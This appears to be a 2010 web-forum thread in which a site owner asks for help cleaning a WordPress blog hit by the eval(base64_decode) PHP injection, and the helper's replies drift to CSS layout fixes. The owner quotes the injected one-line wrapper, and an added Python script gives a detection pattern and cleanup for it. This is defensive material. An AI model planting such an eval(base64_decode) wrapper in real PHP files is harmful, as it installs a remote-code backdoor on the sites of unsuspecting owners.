
How do you restore a site affected by the horrific eval base 64 virus?

by Joern on 14 May 2010 | No comments

Here is what my client wrote. Joern, please advise, man.
Hi Omar,

It's kinda hard for me to articulate via e-mail what exactly the problem is with my site, but I'm hoping that between our discussion, your knowledge and the experts you have access to, I can get this issue resolved quickly.
My blog has been infected with the eval(base64_decode) virus and the following code was added to every .php file I have.
<?php @eval(@base64_decode('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')); ?>
This is the third time that I've been infected with this virus and it's clear that there is a security hole in my WordPress installation. I need help to make sure that all elements of this nasty code are removed from my site on a back end and front end level and to have my installation hardened to make sure this won't happen again.
Typically the virus messes up the GUI of the admin panel, kills my RSS feed and on occasion redirects my site. For whatever reason, the RSS feed still works and it doesn't appear that the site is being redirected, but the GUI is still all messed up and traces of the bad code remain.
At this point it’s probably only a matter of scrubbing files, I just don’t know which ones to scrub as I’m not an expert.
Thanks for your help
Omar

(by: omerkhan01)

Here are 7 more results from this thread:

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14 May 2010 (by: omerkhan01)

Oh yeah dude, I forgot to ask you. Go to my site again at click here. See how Hi there and the Twitter logo are aligned to the left of the DIV whereas the contact tab is to the right. How would you make…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14 May 2010 (by: Joern)

about eval(@base64_decode ...
your theme (I just downloaded it from binuth..) has out of the pack two files with 'eval' in the code, jquery-ui-personalized-1.5.2.packed.js and footer.php
what the jquery-ui-personalized-1.5.2.packed.js does I do not know,... Read more →
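Omar asks which files to scrub, and Joern points out that the theme itself ships two files containing 'eval', so the word alone is not the indicator. As an added example (not code from either poster), this Python script looks only for the exact one-line `<?php @eval(@base64_decode('...')); ?>` wrapper Omar quoted, previews the decoded payload without running it, and strips that block while leaving the file's own code untouched; the file names and sample contents are constructed.

```python
"""Triage helper for the one-line eval(base64_decode()) injection quoted in the thread.
Example code, not from the thread; file names and sample contents are constructed."""
import base64
import re
from pathlib import Path

# The injected block as Omar quoted it: <?php @eval(@base64_decode('...')); ?>
# The '@' suppressors vary between variants, so they are optional; only the full
# PHP wrapper is matched, so a legitimate eval() in packed jQuery is not flagged.
INJECT_RE = re.compile(
    r"<\?php\s*@?eval\(\s*@?base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*;\s*\?>"
)

def find_injections(text: str) -> list[tuple[int, str]]:
    """Return (line_no, decoded_payload_preview) for each injected block in text."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in INJECT_RE.finditer(line):
            try:
                payload = base64.b64decode(m.group(1), validate=True).decode("latin-1")
            except ValueError:
                payload = "<not valid base64>"
            hits.append((no, payload[:80]))  # preview for triage only; never execute it
    return hits

def strip_injections(text: str) -> tuple[str, int]:
    """Remove only the injected blocks; returns (cleaned_text, number_removed)."""
    return INJECT_RE.subn("", text)

def scan_tree(root: Path) -> dict[str, list[tuple[int, str]]]:
    """Map each infected .php file under root to its hits (.js files are not scanned)."""
    return {str(p): h for p in root.rglob("*.php")
            if (h := find_injections(p.read_text(errors="replace")))}

# Constructed samples: an infected footer.php (injection prepended to the real first
# line), its clean original, and a packed-JS fragment that uses eval legitimately.
SAMPLE_PAYLOAD = base64.b64encode(b'echo "constructed sample, not real malware";').decode()
INFECTED = ("<?php @eval(@base64_decode('" + SAMPLE_PAYLOAD + "')); ?><?php\n"
            "// theme footer\nwp_footer();\n")
CLEAN = "<?php\n// theme footer\nwp_footer();\n"
PACKED_JS = "eval(function(p,a,c,k,e,d){return p}('x',1,1,'y'.split('|'),0,{}))"

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "footer.php").write_text(INFECTED)
        (Path(d) / "jquery.packed.js").write_text(PACKED_JS)
        for path, hits in scan_tree(Path(d)).items():
            cleaned, n = strip_injections(Path(path).read_text())
            print(f"{path}: {hits}; removed {n} block(s)")
```

Take a backup before writing the cleaned text back, and treat a hit as a sign the whole install (not just that file) needs review, since the post says the injection reached every .php file.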

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14 May 2010 (by: omerkhan01)

Okay so let me get this straight. You have two div tags in your code, right. One for the div region, which you call div="jw-add-side", like <div class="jw-add-side">. In this one, you put another div for the images, like <div class="jw-add-side-img"><img src="abc.jpg"></div></div>. Is that correct and…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14 May 2010 (by: Joern)

no, leave the code in the template (footer.php?) as it is, or delete the text in there and put the link around the twitter image as below:
Code:
<div class="jw-add-side"><a href="http://twitter.com/yourusername"><img width="25" height="25" title="yourusername" border="0" src="http://maaximummedia.byethost7.com/twitter.jpg" /></a></div>
in this style called
Code:
.jw-add-side {
you have an…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14 May 2010 (by: omerkhan01)

Hey dude, this is what I got, as your suggestion.
.jw-add-side {background:none repeat scroll 0 0 #59B7FF;border:1px solid #FFFFFF;color:#FFFFFF;font-size:16px;height:160px;line-height:normal;position:fixed;right:0;top:100px;width:80px;}
.jw-add-side img... Read more →

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14 May 2010 (by: Joern)

I gave you a new style above (gives just the image)
.jw-add-side {color:#FFFFFF;line-height:normal;position:fixed;right:0;top:100px;}
if you want to keep the blue sample you can move the image inside with
.jw-add-side img {margin-left:30px;margin-top:135p... Read more →

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14 May 2010 (by: omerkhan01)

It worked. I had to clear my browser's cache. Thanks!
Have a nice night
Omar Read more →
